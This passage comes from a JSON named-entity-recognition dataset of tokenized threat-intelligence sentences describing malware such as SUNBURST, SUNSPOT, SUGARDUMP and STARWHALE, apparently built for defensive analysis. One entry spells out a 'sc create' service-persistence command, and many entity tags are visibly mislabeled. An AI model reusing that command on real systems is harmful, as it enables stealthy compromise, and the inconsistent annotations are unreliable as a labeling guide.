"O", - "O" - ] - }, - { - "tokens": [ - "SPACESHIP", - "achieves", - "persistence", - "by", - "creating", - "a", - "shortcut", - "in", - "the", - "current", - "user's", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "has", - "used", - "a", - "character", - "insertion", - "obfuscation", - "technique,", - "making", - "the", - "script", - "appear", - "to", - "contain", - "Chinese", - "characters." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "has", - "scripts", - "that", - "are", - "responsible", - "for", - "deobfuscating", - "additional", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "has", - "used", - "been", - "observed", - "deleting", - "scripts", - "once", - "used." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "can", - "make", - "a", - "direct", - "SQL", - "connection", - "to", - "a", - "Microsoft", - "database", - "controlled", - "by", - "the", - "attackers,", - "retrieve", - "an", - "item", - "from", - "the", - "bindata", - "table,", - "then", - "write", - "and", - "execute", - "the", - "file", - "on", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "relies", - "on", - "users", - "clicking", - "on", - "an", - "embedded", - "image", - "to", - "execute", - "the", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "has", - "used", - "PowerShell", - "to", - "create", - "a", - "Meterpreter", - "session." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "has", - "created", - "scheduled", - "tasks", - "in", - "<code>%appdata%\\Roaming\\Microsoft\\Templates\\</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SQLRat", - "has", - "used", - "SQL", - "to", - "execute", - "JavaScript", - "and", - "VB", - "scripts", - "on", - "the", - "host", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "can", - "collect", - "data", - "from", - "an", - "infected", - "local", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "been", - "obfuscated", - "with", - "hex-encoded", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "can", - "exfiltrate", - "collected", - "data", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "stored", - "collected", - "data", - "in", - "a", - "file", - "called", - "`stari.txt`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "relied", - "on", - "victims", - "opening", - "a", - "malicious", - "Excel", - "file", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "can", - "establish", - "persistence", - "by", - "installing", - "itself", - "in", - "the", - "startup", - "folder,", - "whereas", - "the", - "GO", - "variant", - "has", - "created", - "a", - "`HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM`", - "registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "the", - "ability", - "to", - "hex-encode", - "collected", - "data", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "can", - "gather", - "the", - "computer", - "name", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "the", - "ability", - "to", - "collect", - "the", - "IP", - "address", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "can", - "gather", - "the", - "username", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "can", - "use", - "the", - "VBScript", - "function", - "`GetRef`", - "as", - "part", - "of", - "its", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "the", - "ability", - "to", - "contact", - "actor-controlled", - "C2", - "servers", - "via", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "the", - "ability", - "to", - "execute", - "commands", - "via", - "`cmd.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "STARWHALE", - "has", - "the", - "ability", - "to", - "create", - "the", - "following", - "Windows", - "service", - "to", - "establish", - "persistence", - "on", - "an", - "infected", - "host:", - "`sc", - "create", - "Windowscarpstss", - "binpath=", - "\"cmd.exe", - "/c", - "cscript.exe", - "c:\\\\windows\\\\system32\\\\w7_1.wsf", - "humpback_whale\"", - "start=", - "\"auto\"", - "obj=", - "\"LocalSystem\"`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STEADYPULSE", - "can", - "URL", - "decode", - "key/value", - "pairs", - "sent", - "over", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STEADYPULSE", - "can", - "add", - "lines", - "to", - "a", - "Perl", - "script", - "on", - "a", - "targeted", - "server", - "to", - "import", - "additional", - "Perl", - "modules." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "STEADYPULSE", - "can", - "transmit", - "URL", - "encoded", - "data", - "over", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STEADYPULSE", - "can", - "parse", - "web", - "requests", - "made", - "to", - "a", - "targeted", - "server", - "to", - "determine", - "the", - "next", - "stage", - "of", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "STEADYPULSE", - "is", - "a", - "web", - "shell", - "that", - "can", - "enable", - "the", - "execution", - "of", - "arbitrary", - "commands", - "on", - "compromised", - "web", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "has", - "encrypted", - "collected", - "data", - "using", - "AES", - "CBC", - "mode", - "and", - "encoded", - "it", - "using", - "Base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "has", - "collected", - "browser", - "bookmark", - "and", - "history", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "variants", - "have", - "harvested", - "credentials", - "from", - "browsers", - "such", - "as", - "Firefox,", - "Chrome,", - "Opera,", - "and", - "Edge." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "has", - "sent", - "stolen", - "credentials", - "and", - "other", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "can", - "search", - "for", - "and", - "collect", - "data", - "from", - "specific", - "Chrome,", - "Opera,", - "Microsoft", - "Edge,", - "and", - "Firefox", - "files,", - "including", - "any", - "folders", - "that", - "have", - "the", - "string", - "`Profile`", - "in", - "its", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "has", - "stored", - "collected", - "data", - "under", - "`%<malware_execution_folder>%\\\\CrashLog.txt`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "A", - "SUGARDUMP", - "variant", - "used", - "SMTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "SUGARDUMP", - "variants", - "required", - "a", - "user", - "to", - "enable", - "a", - "macro", - "within", - "a", - "malicious", - ".xls", - "file", - "for", - "execution." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP's", - "scheduled", - "task", - "has", - "been", - "named", - "`MicrosoftInternetExplorerCrashRepoeterTaskMachineUA`", - "or", - "`MicrosoftEdgeCrashRepoeterTaskMachineUA`,", - "depending", - "on", - "the", - "Windows", - "OS", - "version." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "has", - "been", - "named", - "`CrashReporter.exe`", - "to", - "appear", - "as", - "a", - "legitimate", - "Mozilla", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "has", - "created", - "scheduled", - "tasks", - "called", - "`MicrosoftInternetExplorerCrashRepoeterTaskMachineUA`", - "and", - "`MicrosoftEdgeCrashRepoeterTaskMachineUA`,", - "which", - "were", - "configured", - "to", - "execute", - "`CrashReporter.exe`", - "during", - "user", - "logon." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARDUMP", - "can", - "identify", - "Chrome,", - "Opera,", - "Edge", - "Chromium,", - "and", - "Firefox", - "browsers,", - "including", - "version", - "number,", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "SUGARDUMP", - "variant", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARUSH", - "has", - "checked", - "for", - "internet", - "connectivity", - "from", - "an", - "infected", - "host", - "before", - "attempting", - "to", - "establish", - "a", - "new", - "TCP", - "connection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARUSH", - "has", - "used", - "TCP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARUSH", - "has", - "used", - "port", - "4585", - "for", - "a", - "TCP", - "connection", - "to", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARUSH", - "has", - "used", - "`cmd`", - "for", - "execution", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUGARUSH", - "has", - "created", - "a", - "service", - "named", - "`Service1`", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "also", - "removed", - "the", - "firewall", - "rules", - "it", - "created", - "during", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "removed", - "IFEO", - "registry", - "values", - "to", - "clean", - "up", - "traces", - "of", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "was", - "digitally", - "signed", - "by", - "SolarWinds", - "from", - "March", - "-", - "May", - "2020." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "I-Time", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "used", - "DNS", - "for", - "C2", - "traffic", - "designed", - "to", - "mimic", - "normal", - "SolarWinds", - "API", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "attempted", - "to", - "disable", - "software", - "security", - "services", - "following", - "checks", - "against", - "a", - "FNV-1a", - "+", - "XOR", - "hashed", - "hardcoded", - "blocklist." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "dynamically", - "resolved", - "C2", - "infrastructure", - "for", - "randomly-generated", - "subdomains", - "within", - "a", - "parent", - "domain." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "had", - "a", - "command", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "had", - "commands", - "to", - "enumerate", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "created", - "an", - "Image", - "File", - "Execution", - "Options", - "(IFEO)", - "Debugger", - "registry", - "value", - "for", - "the", - "process", - "<code>dllhost.exe</code>", - "to", - "trigger", - "the", - "installation", - "of", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SUNBURST", - "removed", - "HTTP", - "proxy", - "registry", - "values", - "to", - "clean", - "up", - "traces", - "of", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "source", - "code", - "used", - "generic", - "variable", - "names", - "and", - "pre-obfuscated", - "strings,", - "and", - "was", - "likely", - "sanitized", - "of", - "developer", - "comments", - "before", - "being", - "added", - "to", - "SUNSPOT." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SUNBURST", - "delivered", - "different", - "payloads,", - "including", - "TEARDROP", - "in", - "at", - "least", - "one", - "instance." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "added", - "junk", - "bytes", - "to", - "its", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SUNBURST", - "created", - "VBScripts", - "that", - "were", - "named", - "after", - "existing", - "services", - "or", - "folders", - "to", - "blend", - "into", - "legitimate", - "activities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "had", - "commands", - "that", - "allow", - "an", - "attacker", - "to", - "write", - "or", - "delete", - "registry", - "keys,", - "and", - "was", - "observed", - "stopping", - "services", - "by", - "setting", - "their", - "<code>HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start</code>", - "registry", - "entries", - "to", - "value", - "4.", - "It", - "also", - "deleted", - "previously-created", - "Image", - "File", - "Execution", - "Options", - "(IFEO)", - "Debugger", - "registry", - "values", - "and", - "registry", - "keys", - "related", - "to", - "HTTP", - "proxy", - "to", - "clean", - "up", - "traces", - "of", - "its", - "activity." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "SUNBURST", - "strings", - "were", - "compressed", - "and", - "encoded", - "in", - "Base64.", - "SUNBURST", - "also", - "obfuscated", - "collected", - "system", - "information", - "using", - "a", - "FNV-1a", - "+", - "XOR", - "algorithm." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "a", - "list", - "of", - "process", - "names", - "that", - "were", - "hashed", - "using", - "a", - "FNV-1a", - "+", - "XOR", - "algorithm", - "to", - "check", - "against", - "similarly-hashed", - "hardcoded", - "blocklists." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "masqueraded", - "its", - "network", - "traffic", - "as", - "the", - "Orion", - "Improvement", - "Program", - "(OIP)", - "protocol." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "the", - "registry", - "value", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid</code>", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "used", - "Rundll32", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "checked", - "for", - "a", - "variety", - "of", - "antivirus/endpoint", - "detection", - "agents", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "used", - "Base64", - "encoding", - "in", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "C2", - "data", - "attempted", - "to", - "appear", - "as", - "benign", - "XML", - "related", - "to", - ".NET", - "assemblies", - "or", - "as", - "a", - "faux", - "JSON", - "blob." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SUNBURST", - "encrypted", - "C2", - "traffic", - "using", - "a", - "single-byte-XOR", - "cipher." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "checked", - "the", - "domain", - "name", - "of", - "the", - "compromised", - "host", - "to", - "verify", - "it", - "was", - "running", - "in", - "a", - "real", - "environment." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "hostname", - "and", - "OS", - "version." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "all", - "network", - "interface", - "MAC", - "addresses", - "that", - "are", - "up", - "and", - "not", - "loopback", - "devices,", - "as", - "well", - "as", - "IP", - "address,", - "DHCP", - "configuration,", - "and", - "domain", - "information." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "a", - "list", - "of", - "service", - "names", - "that", - "were", - "hashed", - "using", - "a", - "FNV-1a", - "+", - "XOR", - "algorithm", - "to", - "check", - "against", - "similarly-hashed", - "hardcoded", - "blocklists." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "collected", - "device", - "`UPTIME`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SUNBURST", - "remained", - "dormant", - "after", - "initial", - "access", - "for", - "a", - "period", - "of", - "up", - "to", - "two", - "weeks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "used", - "VBScripts", - "to", - "initiate", - "the", - "execution", - "of", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "communicated", - "via", - "HTTP", - "GET", - "or", - "HTTP", - "POST", - "requests", - "to", - "third", - "party", - "servers", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNBURST", - "used", - "the", - "WMI", - "query", - "<code>Select", - "*", - "From", - "Win32_SystemDriver</code>", - "to", - "retrieve", - "a", - "driver", - "listing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "modified", - "its", - "security", - "token", - "to", - "grants", - "itself", - "debugging", - "privileges", - "by", - "adding", - "<code>SeDebugPrivilege</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "malware", - "was", - "designed", - "and", - "used", - "to", - "insert", - "SUNBURST", - "into", - "software", - "builds", - "of", - "the", - "SolarWinds", - "Orion", - "IT", - "management", - "product." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "decrypts", - "SUNBURST,", - "which", - "was", - "stored", - "in", - "AES128-CBC", - "encrypted", - "blobs." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "only", - "replaces", - "SolarWinds", - "Orion", - "source", - "code", - "if", - "the", - "MD5", - "checksums", - "of", - "both", - "the", - "original", - "source", - "code", - "file", - "and", - "backdoored", - "replacement", - "source", - "code", - "match", - "hardcoded", - "values." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Following", - "the", - "successful", - "injection", - "of", - "SUNBURST,", - "SUNSPOT", - "deleted", - "a", - "temporary", - "file", - "it", - "created", - "named", - "<code>InventoryManager.bk</code>", - "after", - "restoring", - "the", - "original", - "SolarWinds", - "Orion", - "source", - "code", - "to", - "the", - "software", - "library." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "enumerated", - "the", - "Orion", - "software", - "Visual", - "Studio", - "solution", - "directory", - "path." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "was", - "identified", - "on", - "disk", - "with", - "a", - "filename", - "of", - "<code>taskhostsvc.exe</code>", - "and", - "it", - "created", - "an", - "encrypted", - "log", - "file", - "at", - "<code>C:\\Windows\\Temp\\vmware-vmdmp.log</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - 